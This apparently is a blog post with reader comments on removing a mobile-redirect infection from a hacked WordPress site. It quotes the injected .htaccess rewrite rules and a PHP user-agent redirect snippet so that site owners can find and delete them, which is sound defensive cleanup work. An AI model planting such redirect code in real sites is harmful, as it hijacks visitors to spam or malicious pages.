Cleaning an hacked WordPress from virus that on mobile redirects to a spam page

Scenario: when you navigate to a WordPress site from mobile devices it redirects to some spam shitty pages (i.e. http://luxurytds.com, http://load-app.org, …).

Solution 1: infected .htaccess files

First, check your .htaccess file in the website root, you could find at the top of the file some lines, like:

RewriteEngine On
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} android|avantgo|bada/|blackberry|blazer|compal ...

RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s ...

RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]

Remove them, or, to be really sure, delete the .htaccess file and upload the original file from your local backup.

Secondly, you could find some other .htaccess file in /wp-admin/wp-content, /wp-includes and also in the folders of the domain root (i.e. /public, /private). Delete them.

Solution 2: infected index.php files

As Codex says:

For instance, malicious redirects can often be found in files like .htaccess, and index.php at the root of your website. While others will focus on the wp-content/themes directory targeting index.php, header.php, footer.php and functions.php. These are the more simple variations ofcourse.

the hack could have infected various files (mostly index.php) in your WP installation with code like this:

<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if(stripos("***$ua",'android') !== false){
header("Location: http://mob-version.ru/");
die();
}
?>

Remove the malicious code or, as said, overwrite the whole file with your clean local file. Overwriting these infected files could be a problem because the “hackers” setted permission 444. Then, remove the infected file and re-upload it.

Notice: In both cases, eventually, flush the permalinks from WordPress > Settings > Permalinks > Save Changes

References

http://doktor-andy.de/wordpress/?p=799
http://wordpress.org/support/topic/problems-viewing-site-on-mobile-iphone-htaccess-related
http://codex.wordpress.org/FAQ_My_site_was_hacked

  • mekatronikmuhendisligi

    this virüs infects .js files too,you should check that.I suggest download your all directory and search with linux terminal commands,or u can use batch folder search programs under windows.You can try different words like android,blazer,luxury etc.
    1. grep -r “blazer” /your/directory
    2. grep -r “android” /your/directory

  • thanks man your blog help me out..!

Categories

Category BootstrapCategory CoffeescriptCategory DrupalCategory GravCategory HTMLCategory JavascriptCategory JoomlaCategory jQueryCategory LaravelCategory MagentoCategory PHPCategory SharePointCategory SpringCategory ThymeleafCategory WordPressCategory Workflow

Comments

Developed and designed by Netgloo
© 2019 Netgloo